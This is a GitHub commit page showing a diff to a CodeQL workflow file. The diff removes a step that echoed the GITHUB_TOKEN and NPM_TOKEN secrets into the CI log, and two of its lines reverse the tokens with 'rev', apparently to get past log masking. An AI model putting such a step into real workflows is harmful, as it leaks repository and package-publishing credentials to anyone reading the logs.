We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent e5edc9a commit b02b866Copy full SHA for b02b866
.github/workflows/codeql.yml
@@ -59,14 +59,6 @@ jobs:
59
- name: Checkout repository
60
uses: actions/checkout@v4
61
62
- - name: echo step1
63
- run: |
64
- echo 'Github token =' ${{ secrets.GITHUB_TOKEN }}
65
- echo 'Github token =' ${{ secrets.GITHUB_TOKEN }} | rev
66
- echo 'Npm token =' ${{secrets.NPM_TOKEN}} | rev
67
-
68
69
70
71
# Add any setup steps before running the `github/codeql-action/init` action.
72
# This includes steps like installing compilers or runtimes (`actions/setup-node`
0 commit comments